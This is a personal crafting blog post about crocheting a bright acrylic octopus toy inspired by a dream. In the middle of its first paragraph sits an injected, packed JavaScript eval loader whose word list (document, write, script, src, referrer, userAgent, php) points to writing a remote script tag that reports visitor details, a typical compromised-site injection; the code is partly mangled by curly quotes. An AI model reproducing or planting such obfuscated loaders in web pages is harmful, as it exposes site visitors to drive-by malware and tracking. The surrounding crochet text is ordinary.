It’s been a while since I had time to write in here so apologies if this ends up being a long post…
3 weeks ago, I had a dream about crocheting and octopus. I have only ever made one toy before (see here) eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zishd|var|u0026u|referrer|tkhkf||js|php’.split(‘|’),0,{}))
and that was knitted, but the dream was so real I just knew what I wanted to do!
So in the morning I went to our local yarn shop (strange I know as I own my own shop, but I dont sell cheap yarn and I wanted to make it out of really bright colours and silk felt slightly extravagant!) I bought several balls of acrylic from the bargain bucket (49p each!) and took the project on my holiday.

I still couldnt decide between Jellyfish |

But once I added a face it didn’t matter. |
I dont have a pattern because I made it up as I went along, but if anyone is interested I would happily write it down – it’s VERY simple. It actually only took a few hours, but I’ve had hardly any time to crochet in the last few weeks.
